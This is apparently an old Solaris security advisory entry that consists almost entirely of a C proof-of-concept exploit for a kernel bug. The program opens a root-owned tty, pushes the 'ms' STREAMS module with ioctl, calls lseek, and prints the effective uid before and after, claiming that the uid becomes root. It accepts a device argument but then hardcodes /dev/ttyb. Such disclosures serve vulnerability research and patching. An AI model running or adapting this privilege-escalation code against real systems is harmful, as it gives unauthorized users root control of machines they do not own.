COMMAND

    kernel

SYSTEMS AFFECTED

    Solaris


/*
    If a tty port that is writeable  by the user and owned by root  is
    opened and the  I_PUSH "ms" ioctl  call made followed  by an lseek
    the   effective   uid   of   the   user   is   changed   to  root.
*/

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <stropts.h>
#include <sys/stat.h>
#include <sys/conf.h>

main(argc, argv)
    int		argc;
    char*	argv[];
{
    int		fd;

    if (argc < 2)
	{
	fprintf(stderr, "usage: %s /dev/ttyX\n", argv[0]);
	exit(1);
	}

    fd = open("/dev/ttyb", O_RDWR);
    printf("Your current effective uid is %d\n", geteuid());
    ioctl(fd, I_PUSH, "ms");
    lseek(fd, 0, 1);
    printf("Your effective uid has been changed to %d\n", geteuid());
}